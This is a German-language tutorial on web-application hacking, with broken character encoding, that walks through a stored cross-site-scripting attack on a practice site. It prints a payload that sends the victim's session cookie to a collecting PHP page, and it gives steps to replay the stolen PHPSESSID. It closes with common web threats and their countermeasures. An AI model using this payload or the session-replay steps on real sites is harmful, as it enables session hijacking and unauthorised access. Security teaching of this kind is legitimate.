Wie hackt man eine Website? Techniken zum Website-Hacking
โก Intelligente Zusammenfassung
Webseiten-Hacking nutzt Schwachstellen in Webanwendungen aus โ schlecht geschriebenen Code, nicht bereinigte Eingaben und unzureichende Sitzungsverwaltung โ, um unbefugten Zugriff zu erlangen. Diese Seite zeigt gรคngige Angriffstechniken und, noch wichtiger, die Gegenmaรnahmen, die eine Webseite schรผtzen.

Mehr Menschen haben Zugang zum Internet als je zuvor. Dies hat viele Organisationen dazu veranlasst, webbasierte Anwendungen zu entwickeln, die Benutzer online verwenden kรถnnen, um mit der Organisation zu interagieren. Schlecht geschriebener Code fรผr Webanwendungen kann ausgenutzt werden, um sich unbefugten Zugriff auf sensible Daten und Webserver zu verschaffen.
Sie lernen gรคngige Techniken des Website-Hackings und die Gegenmaรnahmen kennen, die vor solchen Angriffen schรผtzen.
So hacken Sie eine Website
In diesem praktischen Szenario zum Website-Hacking werden wir die Benutzersitzung der Webanwendung kapern, die sich unter befindet www.techpanda.orgWir werden Cross-Site-Scripting einsetzen, um die Cookie-Session-ID auszulesen und diese dann zu verwenden, um eine legitime Benutzersitzung zu imitieren.
Es wird davon ausgegangen, dass der Angreifer Zugriff auf die Webanwendung hat und die Sitzungen anderer Benutzer derselben Anwendung รผbernehmen mรถchte. Ziel dieses Angriffs kรถnnte die Erlangung von Administratorrechten fรผr die Webanwendung sein, vorausgesetzt, das Benutzerkonto des Angreifers ist eingeschrรคnkt.
Schritt 1) รffnen URL http://www.techpanda.org/.
Fรผr รbungszwecke wird dringend empfohlen, sich Zugriff mittels SQL-Injection zu verschaffen. Siehe dazu Dieser Artikel รผber SQL-Injection Weitere Informationen dazu finden Sie hier.
Schritt 2) Geben Sie Ihre Anmeldedaten ein.
Die Anmelde-E-Mail-Adresse lautet admin@google.com und das Passwort ist Password2010.
Schritt 3) Dashboard prรผfen.
Wenn Sie sich erfolgreich angemeldet haben, wird Ihnen das folgende Dashboard angezeigt.
Schritt 4) Neuen Inhalt eingeben.
Klicken Sie auf โNeuen Kontakt hinzufรผgenโ und geben Sie Folgendes als Vornamen ein:
<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>
Schritt 5) Hinzufรผgen JavaSkript.
Der obige Code verwendet JavaSkript. Es fรผgt einen Hyperlink mit einem onclick-Ereignis hinzu. Wenn der ahnungslose Benutzer auf den Link klickt, ruft das Ereignis die Daten ab. PHP-Cookie-Sitzungs-ID und sendet es zusammen mit der Sitzungs-ID an die Seite snatch_sess_id.php. URL.
Schritt 6) Details hinzufรผgen.
Geben Sie die restlichen Details wie unten gezeigt ein und klicken Sie auf โรnderungen speichernโ.
Schritt 7) Dashboard prรผfen.
Ihr Dashboard sieht nun wie folgt aus.
Schritt 8) Sitzungs-ID prรผfen.
Da das Cross-Site-Script in der Datenbank gespeichert ist, wird es bei jeder Anmeldung von Benutzern mit Zugriffsrechten geladen. Wenn sich der Administrator anmeldet und auf den Link โDarkโ klickt, รถffnet sich ein Fenster, in dem die Sitzungs-ID angezeigt wird. URL.
Hinweis: Das Skript kรถnnte den Wert an einen Remote-Server senden, auf dem die PHPSESSID gespeichert ist, und den Benutzer dann so zurรผckleiten, als wรคre nichts geschehen.
Hinweis: Der von Ihnen ermittelte Wert kann von dem hier angezeigten Wert abweichen, das Grundprinzip bleibt jedoch gleich.
Sitzungsidentitรคtswechsel mit Firefox und Manipulationsdaten-Add-on
Hinweis: Das unten gezeigte klassische Tamper Data-Add-on lรคsst sich auf aktuellen Systemen nicht mehr installieren. FirefoxDas zugrundeliegende Konzept โ das Abfangen und Modifizieren einer HTTP-Anfrage, um eine aufgezeichnete Sitzung wiederzugeben โ bleibt jedoch unverรคndert.
Das folgende Flussdiagramm zeigt die Schritte, die Sie ausfรผhren mรผssen, um diese รbung abzuschlieรen.
- Sie mรผssen die Firefox Webbrowser fรผr diesen Abschnitt und das Add-on โTamper Dataโ.
- รffne Firefox und installieren Sie das Add-on wie in den folgenden Diagrammen gezeigt.
- Suchen Sie nach Manipulationsdaten und klicken Sie dann wie oben gezeigt auf Installieren.
- Klicken Sie auf โAkzeptieren und installierenโฆโ
- Klicken Sie nach Abschluss der Installation auf โJetzt neu startenโ.
- Aktivieren Sie die Menรผleiste in Firefox falls es nicht angezeigt wird.
- Klicken Sie auf das Menรผ โToolsโ und wรคhlen Sie dann โManipulationsdatenโ aus, wie unten dargestellt.
- Es รถffnet sich folgendes Fenster. Hinweis: Falls das Fenster nicht leer ist, klicken Sie auf die Schaltflรคche โLรถschenโ.
- Klicken Sie auf das Menรผ โStart Tamperโ.
- Wechseln Sie zurรผck zu Firefox รffnen Sie Ihren Webbrowser, geben Sie http://www.techpanda.org/dashboard.php ein und drรผcken Sie anschlieรend die Eingabetaste, um die Seite zu laden.
- Sie erhalten folgendes Popup von Tamper Data.
- Das Popup-Fenster bietet drei (3) Optionen. Mit der Option โManipulierenโ kรถnnen Sie die HTTP-Header-Informationen รคndern, bevor sie an den Server gesendet werden.
- Klick es an.
- Sie erhalten das folgende Fenster.
- Kopieren Sie die PHP-Session-ID, die Sie wรคhrend des Angriffs kopiert haben. URL Fรผgen Sie es nach dem Gleichheitszeichen ein. Ihr Wert sollte nun so aussehen.
PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
- Klicken Sie auf die Schaltflรคche OK.
- Das Popup-Fenster โManipulationsdatenโ wird erneut angezeigt.
- Deaktivieren Sie das Kontrollkรคstchen โManipulation fortsetzen?โ
- Klicken Sie anschlieรend auf die Schaltflรคche โAbsendenโ.
- Das Dashboard sollte wie unten dargestellt angezeigt werden.
Hinweis: Wir haben uns nicht eingeloggt; wir haben eine Login-Sitzung nachgestellt, indem wir den PHPSESSID-Wert, den wir mittels Cross-Site-Scripting ermittelt hatten, verwendet haben.
Was ist eine Webanwendung? Was sind Web-Bedrohungen?
Eine Webanwendung (auch Website genannt) basiert auf dem Client-Server-Modell. Der Server stellt den Datenbankzugriff und die Geschรคftslogik bereit. Er wird auf einem Webserver gehostet. Die Clientanwendung lรคuft im Webbrowser des Clients. Webanwendungen werden รผblicherweise in Programmiersprachen wie โฆ geschrieben. JavaC#, VB.NET, PHPund ColdFusion Markup Language usw. Zu den in Webanwendungen verwendeten Datenbank-Engines gehรถren MySQL, MS SQL Server, PostgreSQL, SQLite, usw.
Die besten Website-Hacking-Techniken
Die meisten Webanwendungen werden auf รถffentlichen Servern gehostet. Server Sie sind รผber das Internet zugรคnglich und daher aufgrund der leichten Erreichbarkeit anfรคllig fรผr Angriffe. Im Folgenden werden hรคufige Bedrohungen fรผr Webanwendungen aufgefรผhrt.
- SQL Injection โ Das Ziel dieser Bedrohung kรถnnte darin bestehen, Anmeldealgorithmen zu umgehen, Daten zu sabotieren usw.
- Denial of Service Anschlรคge โ Ziel dieser Bedrohung kรถnnte es sein, legitimen Nutzern den Zugang zur Ressource zu verweigern.
- Cross-Site Scripting (XSS) โ Das Ziel dieser Bedrohung kรถnnte darin bestehen, Code einzuschleusen, der auf dem clientseitigen Browser ausgefรผhrt werden kann.
- Cookie-/Sitzungsvergiftung โ Das Ziel dieser Bedrohung besteht darin, Cookies/Sitzungsdaten durch einen Angreifer zu รคndern, um unbefugten Zugriff zu erhalten.
- Formularmanipulation โ Das Ziel dieser Bedrohung besteht darin, Formulardaten wie Preise in E-Commerce-Anwendungen zu รคndern, damit der Angreifer Artikel zu reduzierten Preisen erhalten kann.
- Code Spritze โ Das Ziel dieser Bedrohung besteht darin, Code wie PHP einzuschleusen. Pythonusw., die auf dem Server ausgefรผhrt werden kรถnnen. Der Code kann Hintertรผren installieren, vertrauliche Informationen preisgeben usw.
- Verunstaltung โ Ziel dieser Bedrohung ist es, die auf einer Website angezeigte Seite zu verรคndern und alle Seitenanfragen auf eine einzige Seite umzuleiten, die die Nachricht des Angreifers enthรคlt.
Wie schรผtzen Sie Ihre Website vor Hacks?
Um sich vor Angriffen auf Webserver zu schรผtzen, kann eine Organisation die folgende Richtlinie รผbernehmen.
- SQL Injection โ Die Bereinigung und Validierung von Benutzerparametern vor deren รbermittlung an die Datenbank zur Verarbeitung kann dazu beitragen, das Risiko eines SQL-Injection-Angriffs zu verringern. Datenbank-Engines wie MS SQL Server, MySQLusw. unterstรผtzen Parameter und vorbereitete Anweisungen. Sie sind wesentlich sicherer als herkรถmmliche SQL-Anweisungen.
- Denial-of-Service-Angriffe Firewalls kรถnnen eingesetzt werden, um den Datenverkehr von verdรคchtigen IP-Adressen zu blockieren, falls es sich um einen einfachen DoS-Angriff handelt. Eine korrekte Netzwerkkonfiguration und ein Intrusion-Detection-System (IDS) kรถnnen ebenfalls dazu beitragen, die Wahrscheinlichkeit eines erfolgreichen DoS-Angriffs zu verringern.
- Cross-Site Scripting โ Validierung und Bereinigung von Headern und Parametern, die รผber die URLFormularparameter und versteckte Werte kรถnnen dazu beitragen, XSS-Angriffe zu reduzieren.
- Cookie-/Sitzungsvergiftung Dies kann verhindert werden, indem der Inhalt der Cookies verschlรผsselt, die Cookies nach einer gewissen Zeit automatisch gelรถscht und die Cookies mit der Client-IP-Adresse verknรผpft werden, die zu ihrer Erstellung verwendet wurde.
- Formularmanipulation Dies kann verhindert werden, indem die Benutzereingaben vor ihrer Verarbeitung validiert und verifiziert werden.
- Code Spritze Dies lรคsst sich verhindern, indem alle Parameter als Daten und nicht als ausfรผhrbarer Code behandelt werden. Dies kann durch Bereinigung und Validierung umgesetzt werden.
- Verunstaltung - eine gute Sicherheit von Webanwendungen Die Richtlinie sollte sicherstellen, dass die รผblicherweise ausgenutzten Sicherheitslรผcken fรผr den Zugriff auf den Webserver geschlossen werden. Dies kann durch eine korrekte Konfiguration des Betriebssystems, der Webserver-Software und die Anwendung bewรคhrter Sicherheitspraktiken bei der Entwicklung erreicht werden.ping Web Applikationen.
รberprรผfen Sie dies: 9 besten URL Scanner zur รberprรผfung, ob ein Link vor Malware geschรผtzt ist


















